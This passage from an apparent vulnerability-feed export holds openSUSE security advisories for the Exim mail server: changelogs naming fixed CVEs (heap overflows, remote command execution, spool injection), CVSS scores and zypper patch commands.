(This seems to\n ask for trouble if your resolver is systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. 
This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, when built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interfaces can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". 
Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. 
Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL.\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol; this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. 
This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \"temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disabling of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. 
Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currently use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. 
Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n This update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-754=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0754-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/3FZPX7R5ELKQM2EW7W2JYZ7EFIIDTT4E/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * 
CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. 
Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location; this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. 
Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the error message once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no longer accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line recipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, when due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. 
Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficiency of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). 
The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector is set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attempted). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver now provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n - spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. 
(This seems to\n ask for trouble if your resolver is systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. 
This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, when built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interfaces can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". 
Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. 
Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL.\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol; this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. 
This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \"temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disabling of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. 
Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currently use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. 
Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-677=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", 
"CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-07T00:00:00", "id": "OPENSUSE-SU-2021:0677-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4UGIR4NXSH3ADTQNJZHHL5EVSFNXRGTQ/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 30 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n exim was updated to 4.94.2:\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset 
function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. 
